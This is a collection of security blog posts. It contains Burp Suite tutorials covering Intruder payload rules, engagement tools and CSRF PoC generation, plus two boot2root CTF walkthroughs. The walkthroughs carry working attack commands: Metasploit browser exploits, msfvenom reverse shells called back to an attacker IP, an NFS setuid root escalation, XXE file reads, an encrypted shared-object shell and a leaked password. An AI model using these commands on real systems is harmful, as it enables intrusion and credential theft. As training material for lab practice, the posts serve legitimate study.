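    find_basic_auth_match "$dict" 'YWRtaW46YWRtaW4=' '^.{0,10}$'
    rm -f "$dict"
}
demo
```

Running the script prints admin:admin, the dictionary line Intruder would flag by its different status code and response length. Because the whole user:pass string is the payload, the dictionary for the Basic authentication attack must contain user:pass pairs, not bare passwords.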

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology.

The post Payload Processing Rule in Burp suite (Part 2) appeared first on Hacking Articles.


Engagement Tools Tutorial in Burp suite

Tue, 06/Feb/2018 - 13:49

Hello friends!! Today we are going to discuss Importance of Engagement tools which is a Pro-only feature of Burp Suite. It is mainly use in information gathering and hence the analysis of any web application testing.

Its four important utilities are following:

  • Find References
  • Discover Content
  • Schedule Task
  • Generate CSRF POC
Find References

This function can be used to search all Burp suite tools for HTTP responses that link to a particular item. To make use of this function, select an HTTP request anywhere in Burp suite, or any part of the site map, and choose “Find references” in “Engagement tools” in the context menu which can be seen clicking Action Tab within Burp suite.

The result window of the search shows the responses (from all Burp tools) that link to the selected item. Whenever we view an individual search result, the response is automatically highlighted to show where the linking reference occurs.

This function treats the original URL as a prefix when it searches for links, so if you select a host, you will find all references to the host, and if you select a folder, you will find all references to items inside that folder.

First, we intercept the request to vulnweb.com, a demo lab available on the internet that can be used for testing attacks. Type the URL of the vulnerable web application into your browser and press Enter; Burp Suite will capture the request to the web page in the Intercept tab.

Then click on the Action tab, select Engagement tools and click on Find References. This opens a result window that shows all the references related to the URL whose request was captured, i.e. the vulnerable web application, as shown in the image.

Discover Content

This function is used to discover content and functionality that is not linked from visible content you can browse or spider.

Burp Suite uses various techniques to discover content, including name guessing, web spidering, and extrapolation from naming conventions observed within the application.

Control

This tab shows you the current status of the session. The toggle button indicates whether the session is running and also allows you to pause and restart it.

The following information is displayed about the progress of the discovery session:

  • Number of requests made
  • Number of bytes transferred in server responses
  • Number of network errors
  • Number of discovery tasks queued
  • Number of spider requests queued
  • Number of responses queued for analysis

Target

This option allows you to define the start directory of the content discovery session and whether files, directories or both should be targeted. The available options are as follows:

  • Start directory – This is the location where Burp Suite starts looking for content. Items within this path and its subdirectories are requested during the session.
  • Discover – This option determines whether the session looks for files, directories or both.

Site Map

The discovery session uses its own site map, showing all the content that has been discovered within the defined scope. If you have configured Burp Suite to do so, newly discovered items can also be added to Burp Suite’s main site map.

First, we intercept the request to vulnweb.com, a demo lab available on the internet that can be used for testing attacks. Type the URL of the vulnerable web application into your browser and press Enter; Burp Suite will capture the request to the web page in the Intercept tab.

Then click on the Action tab within Burp Suite, select Engagement tools and click on Discover Content. This opens a result window showing the discovery session status and the queued tasks for the URL whose request was captured, i.e. the vulnerable web application, as shown in the image.

Schedule Task

This function can be used to automatically start and stop certain tasks at defined times and intervals. We can use the task scheduler to start and stop automated tasks while we are not working, and to save our work periodically or at a specific time.

To use this function, select an HTTP request anywhere in Burp Suite, or any part of the target site map, and choose “Schedule task” under “Engagement tools” in the context menu, which can be opened by right-clicking within Burp Suite.

The types of task that are available within this function are as follows:

  • Scan from a URL
  • Pause active scanning
  • Resume active scanning
  • Spider from a URL
  • Pause spidering
  • Resume spidering
  • Save state

First, we intercept the request to vulnweb.com, a demo lab available on the internet that can be used for testing attacks. Type the URL of the vulnerable web application into your browser and press Enter; Burp Suite will capture the request to the web page in the Intercept tab.

Then click on the Action tab within Burp Suite, select Engagement tools and click on Schedule Task. This opens a window with the schedule task options, where we select the Scan from a URL option as shown in the image.

Then click Next; a window opens where we have to give the URL whose branches in the site map we want to scan.

Then click Next again and the Scanner tab of Burp Suite opens. It scans all the branches beneath the given URL in the site map, which can be seen in the Scan queue tab for the URL whose request was captured, i.e. the vulnerable web application, as shown in the image.

Generate CSRF PoC

This function can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for any given request.

To access this function, select a URL or HTTP request anywhere in Burp Suite and choose “Generate CSRF PoC” under “Engagement tools” in the context menu, which can be opened by right-clicking within Burp Suite.

Let’s start!!

First, we intercept the request of the CSRF (transfer amount) page in the bWAPP lab, where we have entered an account number.

Then click on Transfer; Burp Suite will capture the request of the page in the Intercept tab.

Then click on the Action tab within Burp Suite, select Engagement tools and click on Generate CSRF PoC. This opens the CSRF PoC window, where we change the Account value and the Amount value in the generated CSRF HTML code as shown in the image.

After changing the values, click on the Test in Browser option (or Copy HTML). This opens the Show response in browser window; click on Copy, paste the URL into the browser and press Enter as shown in the image.

A Submit request button appears in the browser; click on it.

We see that the balance is reduced, because the amount was transferred from the account using the values we changed in the CSRF HTML code, as shown in the image.
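To make concrete why the generated PoC succeeds against the lab and what stops it, here is an added Python example; it is not Burp Suite's code and not the bWAPP lab's. It parses a constructed capture of a transfer request, builds the same kind of auto-populated HTML form the Engagement tool generates, and then replays the forged parameters against a toy transfer handler with and without a per-session anti-CSRF token. The host name, session id, TransferHandler class and helper names are assumptions made for the demo.

```python
import secrets
from html import escape
from urllib.parse import parse_qsl

# Constructed sample of a captured transfer request in the style of the bWAPP lab
# (not a real capture; host and session id are placeholders).
CAPTURED_REQUEST = (
    "POST /bWAPP/csrf_2.php HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Cookie: PHPSESSID=constructed-session-id\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "account=123-45678-90&amount=50&action=transfer"
)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, headers and form parameters."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ")
    headers = dict(line.split(": ", 1) for line in header_lines)
    return {"method": method, "path": path, "headers": headers,
            "params": dict(parse_qsl(body))}


def generate_csrf_poc(req: dict, overrides: dict = None, scheme: str = "http") -> str:
    """Build the auto-populated HTML form that the Engagement tool produces.

    `overrides` plays the role of editing the Account and Amount values in the
    generated HTML before testing it in the browser."""
    params = {**req["params"], **(overrides or {})}
    action = f"{scheme}://{req['headers']['Host']}{req['path']}"
    inputs = "\n".join(
        f'      <input type="hidden" name="{escape(k)}" value="{escape(v)}" />'
        for k, v in params.items())
    return (f'<html>\n  <body>\n    <form action="{escape(action)}" method="{req["method"]}">\n'
            f'{inputs}\n      <input type="submit" value="Submit request" />\n'
            f'    </form>\n  </body>\n</html>\n')


class TransferHandler:
    """Toy server-side handler for the transfer page (an assumption, not bWAPP code).

    With enforce_token=False it behaves like the lab: any request carrying the
    victim's session cookie is honoured, which is exactly why the PoC form works.
    With enforce_token=True the form must echo a per-session anti-CSRF token that
    a cross-site page cannot read, so the PoC is rejected."""

    def __init__(self, enforce_token: bool, balance: int = 1000) -> None:
        self.enforce_token = enforce_token
        self.balance = balance
        self.tokens: dict = {}  # session id -> token embedded in the legitimate form

    def issue_form_token(self, session_id: str) -> str:
        token = secrets.token_hex(16)
        self.tokens[session_id] = token
        return token

    def handle(self, session_id: str, params: dict) -> str:
        if self.enforce_token:
            expected = self.tokens.get(session_id)
            supplied = params.get("token", "")
            if expected is None or not secrets.compare_digest(expected, supplied):
                return "rejected: missing or invalid anti-CSRF token"
        self.balance -= int(params["amount"])
        return f"transferred {params['amount']}"


def run_demo() -> dict:
    """Replay the forged form against both handlers and report the balances."""
    req = parse_request(CAPTURED_REQUEST)
    poc_html = generate_csrf_poc(req, overrides={"amount": "100"})
    forged_params = {**req["params"], "amount": "100"}  # what the PoC form submits

    lab = TransferHandler(enforce_token=False)
    lab_result = lab.handle("victim-session", forged_params)

    hardened = TransferHandler(enforce_token=True)
    hardened.issue_form_token("victim-session")            # the real page got a token...
    hardened_result = hardened.handle("victim-session", forged_params)  # ...the PoC has none

    return {"poc_html": poc_html, "lab_result": lab_result, "lab_balance": lab.balance,
            "hardened_result": hardened_result, "hardened_balance": hardened.balance}


def legitimate_transfer(amount: str = "10") -> tuple:
    """The same-origin form, which carries the token, is still accepted."""
    handler = TransferHandler(enforce_token=True)
    token = handler.issue_form_token("victim-session")
    result = handler.handle("victim-session",
                            {"account": "123-45678-90", "amount": amount, "token": token})
    return result, handler.balance


if __name__ == "__main__":
    demo = run_demo()
    print(demo["poc_html"])
    print("lab:", demo["lab_result"], "balance", demo["lab_balance"])
    print("hardened:", demo["hardened_result"], "balance", demo["hardened_balance"])
```

The token check is what defeats the PoC: the forged form is submitted with the victim's session cookie, but the attacker's page cannot read the token that the legitimate transfer page embeds, so the hardened handler refuses the request and the balance is unchanged.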

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Engagement Tools Tutorial in Burp suite appeared first on Hacking Articles.

Categories: Cyber India

Hack the C0m80 VM (Boot2root Challenge)

Mon, 05/Feb/2018 - 13:20

Hello friends! Today we are going to take another CTF challenge known as C0m80. The credit for making this VM goes to “3mrgnc3” and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.1.127, but you will have to find your own).

netdiscover

Use nmap for port enumeration

nmap -A -p- 192.168.1.127

We find that ports 80, 111, 139, 445, 2049, 20021, 37196, 40325, 41605, 49418 and 58563 are open. As port 80 is running HTTP, we open the IP address in our browser.

We don’t find anything on the web page, so we use dirb to enumerate the directories.

dirb http://192.168.1.127

We find a link to a login page that is running the Mantis bug tracker. We find that this version is vulnerable; we can reset the passwords of the users with this vulnerability. You can read how to exploit this vulnerability here.

Now we exploit this vulnerability to change the password of the users.

We can change the password of every user present simply by changing the id. After changing all the passwords we find that alice (id=4) is the only account with administrative privileges.

Going through the mails we find a page that contains a link to a backup file.

We download the backup file using wget to get more information about the file.

After downloading the backup file we find that it is a hexdump; we use this program here to convert it to binary format.

Then we use binwalk to check for embedded files and binaries and find that there are 2 binaries.

binwalk ftp.bin

We use dd to carve the two files out as an exe and a dll, so that we can run the program.
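The hexdump-to-binary conversion and the binwalk/dd carving from the steps above, as an added Python example that is neither the page's conversion program nor binwalk's code. It assumes the backup is in `hexdump -C` format and that the embedded binaries are PE images; the helper names and the constructed sample data (a 64-byte DOS header dump and a blob holding one fake exe and one fake dll) are assumptions made for the demo.

```python
import re
import struct
from typing import List, Tuple

IMAGE_FILE_DLL = 0x2000  # COFF Characteristics flag set on DLL images


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from `hexdump -C` style text (offset, hex bytes, |ascii|).

    A line containing only '*' means the previous 16-byte line repeats until the
    next offset shown, so that gap is filled rather than silently dropped."""
    out = bytearray()
    last_chunk = b""
    line_re = re.compile(r"^([0-9a-fA-F]{6,8})(?:\s+((?:[0-9a-fA-F]{2}(?:\s+|$))+))?")
    for line in dump.splitlines():
        m = line_re.match(line)
        if not m:                       # '*' lines and anything else are skipped
            continue
        offset = int(m.group(1), 16)
        while len(out) < offset and last_chunk:   # expand a '*' run
            out.extend(last_chunk)
        del out[offset:]
        if m.group(2):
            last_chunk = bytes.fromhex(m.group(2))   # fromhex ignores whitespace
            out.extend(last_chunk)
    return bytes(out)


def find_pe_images(blob: bytes) -> List[Tuple[int, int, str]]:
    """Locate embedded PE images the way binwalk reports them: (offset, size, kind).

    Every 'MZ' is checked for a valid e_lfanew -> 'PE\\0\\0' header; the size is the
    end of the last section's raw data, relative to the MZ offset."""
    found = []
    for m in re.finditer(b"MZ", blob):
        mz = m.start()
        if mz + 0x40 > len(blob):
            break
        e_lfanew = struct.unpack_from("<I", blob, mz + 0x3C)[0]
        pe = mz + e_lfanew
        if e_lfanew > 0x400 or pe + 24 > len(blob) or blob[pe:pe + 4] != b"PE\0\0":
            continue
        nsections = struct.unpack_from("<H", blob, pe + 6)[0]
        opt_size, characteristics = struct.unpack_from("<HH", blob, pe + 20)
        sections = pe + 24 + opt_size
        if sections + 40 * nsections > len(blob):
            continue
        end = e_lfanew + 24 + opt_size + 40 * nsections      # at least the headers
        for i in range(nsections):
            raw_size, raw_ptr = struct.unpack_from("<II", blob, sections + 40 * i + 16)
            end = max(end, raw_ptr + raw_size)
        end = min(end, len(blob) - mz)
        kind = "dll" if characteristics & IMAGE_FILE_DLL else "exe"
        found.append((mz, end, kind))
    return found


def carve(blob: bytes, offset: int, size: int) -> bytes:
    """Equivalent of `dd if=ftp.bin bs=1 skip=<offset> count=<size>`."""
    return blob[offset:offset + size]


def make_fake_pe(is_dll: bool, section_bytes: bytes) -> bytes:
    """Constructed minimal PE-shaped blob for the demo; it is not a runnable binary."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0                               # no optional header in this toy image
    characteristics = IMAGE_FILE_DLL if is_dll else 0x0002
    raw_ptr = e_lfanew + 24 + 40               # section data right after one section header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, characteristics)
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(section_bytes), 0x1000,
                                            len(section_bytes), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos_header + coff + section + section_bytes


# Constructed hexdump of a 64-byte DOS header (with a '*' repeat line), not real data.
SAMPLE_HEXDUMP = """\
00000000  4d 5a 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |MZ..............|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000030  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 00  |............@...|
00000040
"""

# Constructed backup blob: padding, a fake exe, junk, a fake dll.
SAMPLE_BLOB = (b"\0" * 0x200 + make_fake_pe(False, b"EXE" * 10)
               + b"\xff" * 16 + make_fake_pe(True, b"DLL" * 5))

if __name__ == "__main__":
    for offset, size, kind in find_pe_images(SAMPLE_BLOB):
        print(f"{kind} at 0x{offset:x}, {size} bytes -> carve as dump.{kind}")
```

Against a real backup you would feed the converted bytes of the whole dump to find_pe_images and then carve each reported (offset, size) pair; the kind column tells you which output to name .exe and which .dll, as the dd step above does by hand.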

Now we run the program and find that it is an FTP server program.

We use netstat to check the open ports and find that port 20021 is listening on our system.

netstat -antp

We use netcat to connect to it and confirm that it is indeed an FTP server application.

nc localhost 20021

 

We now reverse engineer the exe file using OllyDbg for more information, and find that when it reads http: it opens the link in the browser.

We use the browser_autopwn2 auxiliary module to search for vulnerabilities.

msf > use auxiliary/server/browser_autopwn2

msf auxiliary(server/browser_autopwn2)> set lhost 192.168.1.130

msf auxiliary(server/browser_autopwn2)> run

We find that the server can be exploited using firefox_proto_crmfrequest, so we set up our listener in Metasploit.

msf > use exploit/multi/browser/firefox_proto_crmfrequest

msf exploit(multi/browser/firefox_proto_crmfrequest) > set lhost 192.168.1.130

msf exploit(multi/browser/firefox_proto_crmfrequest) > set lport 4444

msf exploit(multi/browser/firefox_proto_crmfrequest) > set target 1

msf exploit(multi/browser/firefox_proto_crmfrequest) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/browser/firefox_proto_crmfrequest) > run

Now we copy the link given by Metasploit and send it to the FTP server running on the target machine.

As soon as we run the command we get our reverse shell.

Going through the files we get a hint of a file that contains all the passwords.

So we use the search command to find all the files with that name on the server.

search -f *PWMangr2*

We download the file to our machine.

Now we open the file and find all the passwords.

Now, as the author of the machine states that we can directly access the machine, we go to the server and use the password we found for RDP.

Now that we have access to the machine, we find an SSH private key. Our nmap scan showed no SSH service running on the server, so we take a look at the SSH configuration files and find that SSH only accepts local connections on port 65122.

Now we use the private key we found to log in as al1ce, as it is the other account used on this server.

We use plink to log in through SSH with the key. We get a prompt to unlock the key, so we use the al1ce password we found (7M6Kt8tC8X5Qz99@Eeb8592Z$Fd@u286) to unlock the private key.

plink -l al1ce localhost -i id_rsa -P 65122

Now we are logged in as al1ce.

Now, the server is running NFS, so we can use this to upload setuid root binaries.

Now we create a shell using metasploit.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.130 lport=4444 -f elf > shell

Now we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.130

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Now we use a script called nfspysh to interact with NFS; we upload our shell and give it execute permission along with the setuid bit.

Now we go to the target machine and run the shell.

As soon as we run the shell, we get the reverse shell as root.

Now we find that we are the root user.

Now we go to the root folder and find the congratulatory flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the C0m80 VM (Boot2root Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Payload Processing Rule in Burp suite (Part 1)

Sat, 03/Feb/2018 - 15:02

Hello friends!! Today we are going to discuss the “Payload Processing” option of Burp Suite, an advanced feature under the Intruder tab used when making brute-force attacks.

Payload Processing

Payload Processing means that, once payloads have been generated by a payload type, they can be further manipulated or filtered using various processing rules and payload encoding.

Payload Processing Rules

These rules are defined to perform various processing tasks on each payload before it is used. The rules are executed in sequence, and they can be used to help debug any problem with the configuration. Payload processing rules are useful in situations where you need to generate different payloads, or where you want to wrap payloads within a wider structure or encoding scheme.

There are 12 types of payload processing rules available:

  • Add prefix
  • Add suffix
  • Match / Replace
  • Substring
  • Reverse substring
  • Modify case
  • Encode
  • Decode
  • Hash
  • Add raw payload
  • Skip if matches regex
  • Invoke Burp extension

Let’s start!!

Add Prefix

This processing rule adds a prefix before each payload.

First, we intercept the request of the login page in the bWAPP lab, where we have entered the default username and a wrong password. Then click on Login; Burp Suite will capture the request of the login page in the Intercept tab.

Send the captured request to Intruder by clicking on the Action tab. Now open the Intruder tab and select the Positions tab, where you can observe the highlighted password, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window frame.
  • Select the field we want to attack, i.e. the password field, and click on the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password field, which means we need one dictionary file for the password.

Now click on the Payloads tab after selecting the payload position. Then select the Payload type as Simple list and add a dictionary by clicking on the Load button. We can either load a dictionary file or add input strings manually using the Add button in the payload options, as shown in the image.

Before executing the attack we add a payload processing rule of the type Add Prefix with the input string “hash”, which is added as a prefix to every input string in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while Burp Suite does its work and tries the passwords. The moment it finds the correct value, the response length changes, as shown in the image.

To confirm the matched password, we enter it on the bWAPP login page, which logs us into the bWAPP lab successfully. This shows the success of our attack, as shown in the image.

Add Suffix

This processing rule adds a suffix after each payload.

First, we intercept the request of the login page in the bWAPP lab, where we have entered the default username and a wrong password. Then click on Login; Burp Suite will capture the request of the login page in the Intercept tab.

Send the captured request to Intruder by clicking on the Action tab. Now open the Intruder tab and select the Positions tab, where you can observe the highlighted password, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window frame.
  • Select the field we want to attack, i.e. the password field, and click on the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password field, which means we need one dictionary file for the password.

Now click on the Payloads tab after selecting the payload position. Then select the Payload type as Simple list and add a dictionary by clicking on the Load button. We can either load a dictionary file or add input strings manually using the Add button in the payload options, as shown in the image.

Before executing the attack we add a payload processing rule of the type Add Suffix with the input string “1234”, which is added as a suffix to every input string in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while Burp Suite does its work and tries the passwords. The moment it finds the correct value, the response length changes, as shown in the image.

Use this combination of username and password to log in and verify that your brute-force attack found the correct password.

Match / Replace

This processing rule replaces any part of the payload that matches a specific regular expression with a given string.

First, we intercept the request of the login page in the bWAPP lab, where we have entered the default username and a wrong password. Then click on Login; Burp Suite will capture the request of the login page in the Intercept tab.

Send the captured request to Intruder by clicking on the Action tab. Now open the Intruder tab and select the Positions tab, where you can observe the highlighted password, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window frame.
  • Select the field we want to attack, i.e. the password field, and click on the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password field, which means we need one dictionary file for the password.

Now click on the Payloads tab after selecting the payload position. Then select the Payload type as Simple list and add a dictionary by clicking on the Load button. We can either load a dictionary file or add input strings manually using the Add button in the payload options, as shown in the image.

Before executing the attack we add a payload processing rule of the type Match / Replace with the input “9870” in the Match Regex field, which is matched against the input strings in the dictionary; wherever there is a match it is replaced with the input “1234” given in the Replace with field, as shown in the image.

Select Start Attack in the Intruder menu.

Sit back and relax while Burp Suite does its work and tries the passwords. The moment it finds the correct value, the response length changes, as shown in the image.

Use this combination of username and password to log in and verify that your brute-force attack found the correct password.

Substring

This processing rule extracts a sub-portion of the payload, starting from a specified offset up to a specified length. Here the offset and length are counted from the front.

First, we intercept the request of the login page in the bWAPP lab, where we have entered the default username and a wrong password. Then click on Login; Burp Suite will capture the request of the login page in the Intercept tab.

Send the captured request to Intruder by clicking on the Action tab. Now open the Intruder tab and select the Positions tab, where you can observe the highlighted password, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window frame.
  • Select the field we want to attack, i.e. the password field, and click on the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password field, which means we need one dictionary file for the password.

Now click on the Payloads tab after selecting the payload position. Then select the Payload type as Simple list and add a dictionary by clicking on the Load button. Here we added the dictionary using the “Add from list” option, as shown in the image below.

Before executing the attack we add a payload processing rule of the type Substring with the input “0” in the From option, which specifies the offset, and the input “3” in the Length option, which specifies the length of the input strings.

For example, if “password” is a word in the dictionary and the above filter is applied, it numbers the letters p = 0, a = 1, s = 2 and s = 3 and hence reads only “pass” from the whole word “password”.

The length specified selects only those inputs having that specific length; inputs of lower or greater length are discarded, as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax while Burp Suite does its work and tries the passwords. The moment it finds the correct value, the response length changes, as shown in the image.

Use this combination of username and password to log in and verify that your brute-force attack found the correct password.

Reverse Substring

This processing rule works like the Substring rule, but the end offset is specified counting backwards from the end of the payload, and the length is counted backwards from that end offset.

First, we intercept the request of the login page in the bWAPP lab, where we have entered the default username and a wrong password. Then click on Login; Burp Suite will capture the request of the login page in the Intercept tab.

Send the captured request to Intruder by clicking on the Action tab. Now open the Intruder tab and select the Positions tab, where you can observe the highlighted password, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window frame.
  • Select the field we want to attack, i.e. the password field, and click on the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password field, which means we need one dictionary file for the password.

Now click on the Payloads tab after selecting the payload position. Then select the Payload type as Simple list and add a dictionary by clicking on the Load button. Here we added the dictionary using the “Add from list” option, as shown in the image below.

Before executing the attack we add a payload processing rule of the type Reverse Substring with the input “2” in the From option, which specifies the offset, and the input “9” in the Length option, which specifies the length of the input strings. These options are similar to the Substring rule, but the offset is counted backwards from the end of the payload and the length is counted backwards from where the offset ends.

For example, if “admin123456” is a word in the dictionary and the above filter is applied, it numbers the characters backwards as 4 = 0, 3 = 1, 2 = 2, 1 = 3, n = 4, i = 5, m = 6, d = 7 and a = 8, and hence reads only ‘admin1234’ from the whole word “admin123456”.

The length specified selects only those inputs having that specific length; inputs of lower or greater length are discarded, as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax while Burp Suite does its work and tries the passwords. The moment it finds the correct value, the response length changes, as shown in the image.

Use this combination of username and password to log in and verify that your brute-force attack found the correct password.

Modify Case

This processing rule can be used to modify the case of the payload if needed. It has the same options as the Case Modification payload type, which we explained in Part-1 of the Payload types article.
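As an added example covering the rules of this article together with the Skip if Matches Regex rule from Part 2, here is a Python model of how Intruder's processing chain transforms each payload before it is sent; it is not Burp Suite's own code. The rule semantics follow Burp's documented descriptions as I read them (an assumption; in particular Substring here takes an offset and a length from the front, so From=0 with Length=4 yields “pass”, while Reverse Substring with From=2 and Length=9 yields ‘admin1234’ as in the walkthrough), and the word list is constructed.

```python
import hashlib
import re
from typing import Callable, Iterable, Iterator, List, Optional

# A rule maps one payload to its processed form, or to None to skip it.
Rule = Callable[[str], Optional[str]]


def add_prefix(prefix: str) -> Rule:
    """Add prefix: put a fixed string before the payload."""
    return lambda payload: prefix + payload


def add_suffix(suffix: str) -> Rule:
    """Add suffix: append a fixed string after the payload."""
    return lambda payload: payload + suffix


def match_replace(pattern: str, replacement: str) -> Rule:
    """Match / Replace: swap every part matching the regex for the replacement."""
    regex = re.compile(pattern)
    return lambda payload: regex.sub(replacement, payload)


def substring(offset: int, length: int) -> Rule:
    """Substring: keep `length` characters starting at `offset` from the front."""
    return lambda payload: payload[offset:offset + length]


def reverse_substring(end_offset: int, length: int) -> Rule:
    """Reverse substring: the end lies `end_offset` characters before the end of
    the payload and `length` characters are taken backwards from there."""
    def rule(payload: str) -> str:
        end = max(len(payload) - end_offset, 0)
        start = max(end - length, 0)
        return payload[start:end]
    return rule


def modify_case(mode: str) -> Rule:
    """Modify case with the same options as the Case Modification payload type."""
    modes = {
        "lower": str.lower,
        "upper": str.upper,
        "propername": lambda s: s[:1].upper() + s[1:].lower(),
        "toggle": str.swapcase,
    }
    return modes[mode]


def hash_payload(algorithm: str) -> Rule:
    """Hash: replace the payload with its hex digest (md5, sha1, sha256, ...)."""
    return lambda payload: hashlib.new(algorithm, payload.encode()).hexdigest()


def skip_if_matches(pattern: str) -> Rule:
    """Skip if matches regex: drop the payload entirely when the regex matches."""
    regex = re.compile(pattern)
    return lambda payload: None if regex.search(payload) else payload


def process(payloads: Iterable[str], rules: List[Rule]) -> Iterator[str]:
    """Apply the rules in order to every payload produced by the payload type.

    As in Intruder, a skipped payload ends the chain and is never sent."""
    for payload in payloads:
        current: Optional[str] = payload
        for rule in rules:
            current = rule(current)
            if current is None:
                break
        if current is not None:
            yield current


# Constructed sample word list standing in for the loaded dictionary.
SAMPLE_WORDLIST = ["bug", "password", "admin123456", "test9870", "user{@}"]

if __name__ == "__main__":
    chain = [skip_if_matches(r"\{@\}"), add_prefix("hash"), add_suffix("1234")]
    for sent in process(SAMPLE_WORDLIST, chain):
        print(sent)
```

Rules compose in the order they are listed, exactly as in the Payload Processing panel, so putting the skip rule first avoids doing prefix and suffix work on payloads that will never be sent.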

Source: portswigger.net

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Payload Processing Rule in Burp suite (Part 1) appeared first on Hacking Articles.

Categories: Cyber India

Hack the Bsides London VM 2017(Boot2Root)

Sat, 03/Feb/2018 - 13:13

Hello friends! Today we are going to take another CTF challenge known as Bsides London 2017. The credit for making this VM goes to “Hacker House” and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.0.7, but you will have to find your own).

Let’s do an nmap scan for port enumeration.

nmap -A -p- 192.168.0.7

We find that port 80 is open and that it is running HTTP.

So we first open 192.168.0.7 in our browser.

We find a hint to use the raft directory wordlist, which is a wordlist used to enumerate directories. So we enumerate the directories using raft-large-directories for further information.

dirb http://192.168.0.7 raft-large-directories

Now we enumerate the directories with common wordlist and find a directory called cgi-bin/.

dirb http://192.168.0.7

As the dirb scan gave us a Forbidden error on the cgi-bin/ directory, we try to look through the files inside cgi-bin/.

dirb http://192.168.0.7/cgi-bin/ -N 403

We open the links found by dirb; one of them contains a login page.

We take a look at the source code and find a hexadecimal string.

We decode it using xxd and find a base64-encoded string. On inspection, the base64 string starts at the Y, so we select the string from the Y onwards, decode it and find a hexadecimal string inside a flag. We decode that and obtain a string.

We use this string as password to login through the login page, we use username as admin.

Even after logging in we don’t find anything on the login page, so we move on to the links provided by the dirb scan.

We find one page that looks like a blank page.

When we take a look at the page source, we find that it is an XML-based page that may be vulnerable to XML External Entity injection (XXE).

We use Burp Suite to capture the request for that page and send it to Repeater; we then use XXE to exploit the system.

We find that only /etc/passwd is visible in plain text; to get the rest of the files we need the PHP base64 filter. So we fetch the apache.conf file to learn about the system.

Now we decode the base64 encoded string and save it in a file ‘bsides-apache.conf’.

Now we check the configuration to find information about the system.

Now we use XXE to get the rest of the configuration files.

We decode the base64 encoded string and then save it as bsides-default.conf.

Now we take a look at the configuration file, we get the location of the cgi configuration file.

Now we use XXE to get the configuration file for CGI files.

We decode the base64 encoded string and save it as bsides-cgi.conf

Now we take a look at the CGI configuration file and find the location of the load file that the dirb scan showed us.

Now we download the load file using XXE to find more information about the file.

We decode the base64 encoded string and save it as bsides-load.

Now we check the file type and find it is an elf executable file.

file bsides-load

We use strings to check the content of the file and find that it is compressed using UPX.

strings bsides-load

Now we use UPX to decompress the file

upx -d bsides-load

After decompressing the file we check the strings and find that it reads a file and decrypts it using the hex value of “WannaCry?”.

Now we use radare to reverse engineer the file and find that it can run files that are encrypted with hex value of ‘WannaCry?’

Now we create the hex value of ‘WannaCry?’. We use od to convert it into hex and sed to remove the spaces between the values.

echo -n "WannaCry?" | od -A n -t x1 | sed 's/ *//g'

We first create a reverse shell to exploit the system. We create pipe files to execute our command.

Now we create a 32-bit shared object file using gcc and convert it to a binary file using the hex value of ‘WannaCry?’ as key with openssl.

gcc -m32 -shared -fPIC -o exploit.so exploit.c

openssl aes-128-cbc -K 'key' -iv 0 -e -in exploit.so -out exploit.bin

Now we upload the file to the server; the dirb scan gave us a link that can be used to upload bin files. After uploading the file we get the location where it is stored. The name of our file also changes after we upload it.

We copy the new file name and use the load file to run our shell.

We setup our listener using netcat, as soon as we execute the shell we get the reverse shell.

Now we find files with suid bit set and find a file in /home/level1/ called shisu

find / -perm -4000 2>/dev/null

We move to the directory and run the file command on it, finding that it is an executable file.

file shisu

When we run the file we find that it runs the command ps.

We are unable to read debugging symbols in gdb, so we use objdump to reverse engineer the file and find that it does a string copy, after which it removes the top 10 bytes from the stack.

objdump -M intel -d shisu

We now use gdb to add a breakpoint before it removes those bytes from the stack. We use Python to print 500 ‘A’s as input. Then we check the stack and find it is overwritten with A’s.

